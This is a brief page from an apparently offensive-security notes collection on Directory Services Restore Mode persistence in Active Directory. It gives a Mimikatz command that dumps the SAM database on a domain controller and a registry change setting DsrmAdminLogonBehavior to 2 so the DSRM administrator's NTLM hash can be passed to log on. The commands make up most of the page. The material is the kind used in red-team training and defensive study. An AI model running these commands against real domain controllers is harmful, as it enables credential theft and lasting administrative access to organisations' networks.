DSRM (Directory Services Restore Mode)

DSRM is Directory Services Restore Mode. There is a local administrator on every DC called "Administrator" whose password is the DSRM password. DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed. After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.

Execution

Dumping the SAM database

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

Requirements before you can pass the hash

## Logon Behavior for the DSRM account needs to be changed before we can use its hash
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

PreviousSilver ticket NextVBA Macros

Last updated 2 years ago